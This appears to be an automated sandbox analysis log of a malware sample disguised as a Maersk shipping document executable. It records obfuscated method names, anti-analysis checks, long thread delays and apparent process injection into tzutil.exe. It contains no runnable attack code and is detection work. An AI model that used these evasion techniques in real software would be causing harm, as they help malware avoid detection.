                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, kpvM8UyIYTVMi9bPW0W.csHigh entropy of concatenated method names: 'KOOcdA8BXJ', 'MUlczLvWCe', 'AOwCr43q3H', 'WXsy6vNbKXZBE2VppwI', 'mZQei9NQyCkE6Cffg7a', 'CWqKK6N6WoD61s9iR8D', 'v7sCqKNfAVxSuPAFSwt'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, bawXrceLwum0Z3TqTZ.csHigh entropy of concatenated method names: 'YCf7qju1t', 'A2xblGokV', 'dIhGKiigg', 'jpZTPCR9l', 'pci6uL4Bt', 'mPCXvXmr9', 'JWZ8k7tQKKe6anEKSJ', 'ks70p5B2FOnBKrapUa', 'yNTaLHNFf', 'XOE8WiGGL'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, j8r72As8idYiS4cyJQ.csHigh entropy of concatenated method names: 'Dispose', 'bEgyZrE1Kp', 'o2ee5J8PUB', 'oDpFWKbUBO', 'B7gydWjG7v', 'g9FyzNZPo9', 'ProcessDialogKey', 'XHoerPq4LI', 'giwey1UJfw', 'KpweeBabeS'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, S0vDJggWwrTvsI39Ur.csHigh entropy of concatenated method names: 'UHtEVMgjsx', 'sKoEdfNHes', 'jp2ar9ZeUN', 'awUayXo6F1', 'ivFEWtE2PL', 'kHZE96MDEs', 'poJEoMUIAm', 'kY7EmPI4UG', 'YuWERrDKim', 'AXYEjABlbX'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, zKCvYgyr0bX92gCtwI7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QQO8W56EcL', 'BFK89Vc2oL', 'IVH8os1hOP', 'x878m92xpK', 'Nu08Rmsm7M', 'YB38jDHO02', 'QwE82pqtNe'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, jMa7fjAUpnw3QeHttd.csHigh entropy of concatenated method names: 'QUasmJHSQf', 'cwAsROPE5f', 'UExsjK5Hok', 'IB9s2bL4Ig', 'bvpsL017DK', 'E75sgKm09E', 'xE6slhRcCb', 'J5FsVmPqym', 'UxFsZ0HQl4', 'TYtsdFWFBX'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, PwOTdlyeCiJ3uIiJPe5.csHigh entropy of concatenated method names: 'ToString', 'N0EcANHGsE', 'sx5c6pG5Nf', 'xtwcX03vwn', 'YGTcwile9P', 'x8ac5ddcmV', 'm79c4TySkb', 'yMxc1KLRtY', 'igK9goNenhKLgXLJslM', 'fxOFdxN2gnOH1kZAQUC'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, QPq4LIZKiw1UJfw3pw.csHigh entropy of concatenated method names: 'FQfOwdk3Gn', 'zCBO5dQIDq', 'BC2O4vLTwc', 'w0KO1dCNZq', 'vktOUkZHMi', 'AYPO31FtZN', 'UjLOuB7m3R', 'S6IONYCh6a', 'UcoOf9OyrQ', 'FxEOMIcOye'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, IvLq0PjlYlfLDXgg9O.csHigh entropy of concatenated method names: 'ToString', 'znSJWlgN4n', 'bodJ5xvKen', 'OUFJ4pK8XS', 'CBEJ1BFthu', 'jpIJUwbGbN', 'QTLJ3VGc3H', 'fhrJubf4QW', 'FF1JN3VYXp', 'YAaJfLWYaZ'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, STaxYklw1yEgrE1Kpn.csHigh entropy of concatenated method names: 'B5SOxqawuj', 'XkuOEVnukK', 'SWwOOgYUg4', 'fkXOcsF3cj', 'yy3OtjJ7Eq', 'KrHOhfRp69', 'Dispose', 'pDGapkrqRj', 'Sd9as1kNhw', 'Cq9aKK8iHn'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, bGnndwySKFCcgL2sCpY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VtnCOvYeJ4', 'LP7C8YOipQ', 'PwwCcUTxGa', 's4WCCsOWFv', 'D3ZCthXjny', 'WFCCBq7NJQ', 'olTCh4j8FL'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, gHmL0kwtwZ7Mumre3n.csHigh entropy of concatenated method names: 'RJykQHxc9m', 'iCQks8UjAr', 'KXckHEylv7', 'cjSkFIj2jI', 'JP0kqoonSl', 'EdOHLJ7L0C', 'PRkHg1WvMC', 'fRuHlbLTm2', 'DykHVeEKB5', 'fy4HZNne5C'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack: High entropy of concatenated method names
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: MAERSK LINE SHIPPING DOC_4253.exe PID: 7564, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: 1700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: 33F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: 9B00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: AB00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: AD20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: BD20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E096E rdtsc 3_2_017E096E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239875Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239757Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239641Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239531Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239416Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239298Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239163Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239042Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238906Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238656Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238525Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238398Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238287Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238156Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238047Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237938Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237813Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237688Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237563Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237438Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237328Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237219Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237094Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236984Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236875Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236765Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236656Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236547Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236438Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236313Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeWindow / User API: threadDelayed 1650Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeWindow / User API: threadDelayed 3663Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\tzutil.exeAPI coverage: 3.0 %
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239757s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239416s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239298s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239163s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239042s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238525s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238398s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238287s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7592Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 5428Thread sleep count: 60 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 5428Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0097C9D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0097C9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\tzutil.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe Code function: 3_2_017E096E rdtsc
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe Code function: 3_2_00417B63 LdrLoadDll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe Code function: 3_2_01844180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018205A7 mov eax, dword ptr fs:[00000030h]3_2_018205A7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018205A7 mov eax, dword ptr fs:[00000030h]3_2_018205A7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A8550 mov eax, dword ptr fs:[00000030h]3_2_017A8550
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A8550 mov eax, dword ptr fs:[00000030h]3_2_017A8550
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE53E mov eax, dword ptr fs:[00000030h]3_2_017CE53E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE53E mov eax, dword ptr fs:[00000030h]3_2_017CE53E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE53E mov eax, dword ptr fs:[00000030h]3_2_017CE53E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE53E mov eax, dword ptr fs:[00000030h]3_2_017CE53E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE53E mov eax, dword ptr fs:[00000030h]3_2_017CE53E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0535 mov eax, dword ptr fs:[00000030h]3_2_017B0535
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0535 mov eax, dword ptr fs:[00000030h]3_2_017B0535
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0535 mov eax, dword ptr fs:[00000030h]3_2_017B0535
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0535 mov eax, dword ptr fs:[00000030h]3_2_017B0535
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0535 mov eax, dword ptr fs:[00000030h]3_2_017B0535
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0535 mov eax, dword ptr fs:[00000030h]3_2_017B0535
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01836500 mov eax, dword ptr fs:[00000030h]3_2_01836500
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874500 mov eax, dword ptr fs:[00000030h]3_2_01874500
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874500 mov eax, dword ptr fs:[00000030h]3_2_01874500
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874500 mov eax, dword ptr fs:[00000030h]3_2_01874500
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874500 mov eax, dword ptr fs:[00000030h]3_2_01874500
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874500 mov eax, dword ptr fs:[00000030h]3_2_01874500
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874500 mov eax, dword ptr fs:[00000030h]3_2_01874500
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874500 mov eax, dword ptr fs:[00000030h]3_2_01874500
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC5ED mov eax, dword ptr fs:[00000030h]3_2_017DC5ED
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC5ED mov eax, dword ptr fs:[00000030h]3_2_017DC5ED
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A25E0 mov eax, dword ptr fs:[00000030h]3_2_017A25E0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE5E7 mov eax, dword ptr fs:[00000030h]3_2_017CE5E7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE5E7 mov eax, dword ptr fs:[00000030h]3_2_017CE5E7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE5E7 mov eax, dword ptr fs:[00000030h]3_2_017CE5E7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE5E7 mov eax, dword ptr fs:[00000030h]3_2_017CE5E7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE5E7 mov eax, dword ptr fs:[00000030h]3_2_017CE5E7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE5E7 mov eax, dword ptr fs:[00000030h]3_2_017CE5E7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE5E7 mov eax, dword ptr fs:[00000030h]3_2_017CE5E7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE5E7 mov eax, dword ptr fs:[00000030h]3_2_017CE5E7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A65D0 mov eax, dword ptr fs:[00000030h]3_2_017A65D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA5D0 mov eax, dword ptr fs:[00000030h]3_2_017DA5D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA5D0 mov eax, dword ptr fs:[00000030h]3_2_017DA5D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE5CF mov eax, dword ptr fs:[00000030h]3_2_017DE5CF
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE5CF mov eax, dword ptr fs:[00000030h]3_2_017DE5CF
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C45B1 mov eax, dword ptr fs:[00000030h]3_2_017C45B1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C45B1 mov eax, dword ptr fs:[00000030h]3_2_017C45B1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE59C mov eax, dword ptr fs:[00000030h]3_2_017DE59C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D4588 mov eax, dword ptr fs:[00000030h]3_2_017D4588
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A2582 mov eax, dword ptr fs:[00000030h]3_2_017A2582
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A2582 mov ecx, dword ptr fs:[00000030h]3_2_017A2582
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CA470 mov eax, dword ptr fs:[00000030h]3_2_017CA470
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CA470 mov eax, dword ptr fs:[00000030h]3_2_017CA470
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CA470 mov eax, dword ptr fs:[00000030h]3_2_017CA470
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0185A49A mov eax, dword ptr fs:[00000030h]3_2_0185A49A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179645D mov eax, dword ptr fs:[00000030h]3_2_0179645D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C245A mov eax, dword ptr fs:[00000030h]3_2_017C245A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182A4B0 mov eax, dword ptr fs:[00000030h]3_2_0182A4B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA430 mov eax, dword ptr fs:[00000030h]3_2_017DA430
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179E420 mov eax, dword ptr fs:[00000030h]3_2_0179E420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179E420 mov eax, dword ptr fs:[00000030h]3_2_0179E420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179E420 mov eax, dword ptr fs:[00000030h]3_2_0179E420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179C427 mov eax, dword ptr fs:[00000030h]3_2_0179C427
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D8402 mov eax, dword ptr fs:[00000030h]3_2_017D8402
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D8402 mov eax, dword ptr fs:[00000030h]3_2_017D8402
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D8402 mov eax, dword ptr fs:[00000030h]3_2_017D8402
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A04E5 mov ecx, dword ptr fs:[00000030h]3_2_017A04E5
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
